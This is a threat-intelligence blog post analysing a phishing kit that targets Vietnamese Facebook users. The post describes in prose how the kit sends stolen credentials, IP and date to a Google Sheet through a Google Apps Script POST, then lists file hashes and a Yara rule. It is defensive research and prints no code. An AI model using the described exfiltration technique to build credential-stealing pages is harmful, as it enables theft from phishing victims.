Phishing kit using Google sheet to exfiltrate stolen data

Analysis of a Facebook phishing kit which exfiltrate stolen data to an online Google Sheet using ajax POST method.

No comments

As we operate a StalkPhish instance which scan thousands suspicious links a day, we often find, let’s say originals, phishing kits to analyse. Today we found a phishing kit targeting vietnamese Facebook users:

vietnamese Facebook phishing page

We retrieved the source code as the zip file was still on the server. The phishing kit sources zip file contains only a page, some images and CSS, and a javascript function:

Phishing kit zip file sources

There is no e-mail exfiltration vector as we can see commonly: this kit uses Google sheet form ajax post function to exfiltrate stolen credentials!

Reading the HTML file source code, we can see the page grab the victim’s IP address, Domain, date:

As well as the identifiers entered by users:

Then the validation-function.js is called. This Javascript function, after data validation and serialization, go to send stolen data to a Google sheet, via a POST method, using it as a database:

kit JS function

This function uses Google Apps Script function which permit to write into Google sheet using the API!

Take aways

index.html (SHA256): 3cfd92bdd9a801382199a52624ecaa8b78a32dc80893f0a6186cce4128c6552b

phishing kit archive (SHA256): 34ee59548f8ba626568d91393acb76791a559f958c1f61bf5dabeb425e396640

Phishing Kit Yara Rule: https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_Facebook_GSheet.yar

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s